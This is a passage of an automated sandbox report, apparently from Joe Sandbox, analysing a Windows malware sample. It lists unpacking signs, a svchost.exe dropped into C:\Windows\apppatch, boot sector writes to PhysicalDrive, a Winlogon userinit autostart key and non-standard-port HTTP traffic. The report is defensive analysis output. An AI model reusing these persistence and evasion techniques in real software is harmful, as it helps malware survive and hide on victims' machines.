Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: swvGCAxOMikYQeoQzimiprVu.exe, 0000000A.00000002.2167317620.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000B.00000000.2059290079.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000D.00000000.2061299411.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000012.00000000.2065037016.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000016.00000000.2086064782.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000019.00000000.2093471617.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000001B.00000002.2109184378.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000001D.00000000.2106806222.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000001F.00000000.2111283138.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000021.00000002.2120935619.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000023.00000002.2130306173.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000025.00000002.2134588404.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000027.00000002.2140976598.000000000056E000.00000002.00000001.01000000.00000009.sdmp

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeUnpacked PE file: 1.2.Z8eHwAvqAh.exe.400000.0.unpack .text:ER;.dHGmL:R;.lzmjSu:W;.YOSWO:R;.sTDEgl:R;.fwQO:R;.L:W;.D:W;.data:W;.kubC:W;.hkw:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeUnpacked PE file: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1590000.2.unpack
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeUnpacked PE file: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.1110000.2.unpack
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeUnpacked PE file: 1.2.Z8eHwAvqAh.exe.400000.0.unpack
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,1_2_004020E0
Source: Z8eHwAvqAh.exeStatic PE information: real checksum: 0x3c9353d5 should be: 0x410a0
Source: svchost.exe.1.drStatic PE information: real checksum: 0x3d792ae1 should be: 0x410a0
Source: Z8eHwAvqAh.exeStatic PE information: section name: .dHGmL
Source: Z8eHwAvqAh.exeStatic PE information: section name: .lzmjSu
Source: Z8eHwAvqAh.exeStatic PE information: section name: .YOSWO
Source: Z8eHwAvqAh.exeStatic PE information: section name: .sTDEgl
Source: Z8eHwAvqAh.exeStatic PE information: section name: .fwQO
Source: Z8eHwAvqAh.exeStatic PE information: section name: .L
Source: Z8eHwAvqAh.exeStatic PE information: section name: .D
Source: Z8eHwAvqAh.exeStatic PE information: section name: .kubC
Source: Z8eHwAvqAh.exeStatic PE information: section name: .hkw
Source: svchost.exe.1.drStatic PE information: section name: .dHGmL
Source: svchost.exe.1.drStatic PE information: section name: .lzmjSu
Source: svchost.exe.1.drStatic PE information: section name: .YOSWO
Source: svchost.exe.1.drStatic PE information: section name: .sTDEgl
Source: svchost.exe.1.drStatic PE information: section name: .fwQO
Source: svchost.exe.1.drStatic PE information: section name: .L
Source: svchost.exe.1.drStatic PE information: section name: .D
Source: svchost.exe.1.drStatic PE information: section name: .kubC
Source: svchost.exe.1.drStatic PE information: section name: .hkw
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_0044B895 push cs; retf 0004h1_2_0044B8F5
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_0044E89D push es; iretd 1_2_0044E8AC
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_0044B1E0 push eax; ret 1_2_0044B20E
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_0044B55E pushad ; ret 1_2_0044B569
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_0044B56A push eax; ret 1_2_0044B56D
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_0044B576 push ss; ret 1_2_0044B579
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_0044EF69 push cs; iretd 1_2_0044EF78
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_0044EF33 push cs; ret 1_2_0044EF48
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_0226016A push ds; ret 1_2_0226016B
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_0226063D push ds; ret 1_2_022605F1
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_0226063D push ebx; ret 1_2_02260677
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_02260678 push dword ptr [esp+48h]; ret 1_2_02260747
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_022604C7 push ds; ret 1_2_022604E6
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_022605A1 push ds; ret 1_2_022605F1
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_022605A1 push ebx; ret 1_2_02260677
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01328B33 push cs; ret 22_2_01328B48
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01328B69 push cs; iretd 22_2_01328B78
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01324DE0 push eax; ret 22_2_01324E0E
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_0132849D push es; iretd 22_2_013284AC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012C61E0 push eax; ret 22_2_012C620E
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012C989D push es; iretd 22_2_012C98AC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012C6895 push cs; retf 0004h22_2_012C68F5
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012B68D2 push ebp; retf 22_2_012B68D3
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012C656A push eax; ret 22_2_012C656D
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012C6576 push ss; ret 22_2_012C6579
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012C655E pushad ; ret 22_2_012C6569
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012ACD5C push ebp; retf 22_2_012ACD5D
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012B664C push ebp; retf 22_2_012B664D
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015D8B69 push cs; iretd 25_2_015D8B78
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015D8B33 push cs; ret 25_2_015D8B48
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015D4DE0 push eax; ret 25_2_015D4E0E

Persistence and Installation Behavior

barindex
Contains functionality to infect the boot sector
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u22_2_012F33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u25_2_015A33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u27_2_00AF33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u29_2_012B33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u31_2_011233F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u33_2_013033F0
Drops PE files with benign system names
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeExecutable created and started: C:\Windows\apppatch\svchost.exeJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\1_2_00403560
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file

Boot Survival

barindex
Contains functionality to infect the boot sector
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u22_2_012F33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u25_2_015A33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u27_2_00AF33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u29_2_012B33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u31_2_011233F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u33_2_013033F0
Creates an undocumented autostart registry key
Source: C:\Windows\apppatch\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinitJump to behavior
Monitors registry run keys for changes
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

barindex
Moves itself to temp directory
Source: c:\users\user\desktop\z8ehwavqah.exeFile moved: C:\Users\user\AppData\Local\Temp\14B3.tmpJump to behavior
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 64057 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 64057
Source: unknownNetwork traffic detected: HTTP traffic on port 64057 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 64057
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012ED300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,22_2_012ED300
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012ECD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,22_2_012ECD50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012ECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,22_2_012ECDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012ECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,22_2_012ECDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012ECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,22_2_012ECDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012ECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,22_2_012ECDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012ECFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,22_2_012ECFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012ECFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,22_2_012ECFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012E9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,22_2_012E9ED0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_0159D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,25_2_0159D300
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_0159CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,25_2_0159CD50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_0159CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,25_2_0159CDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_0159CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,25_2_0159CDC0
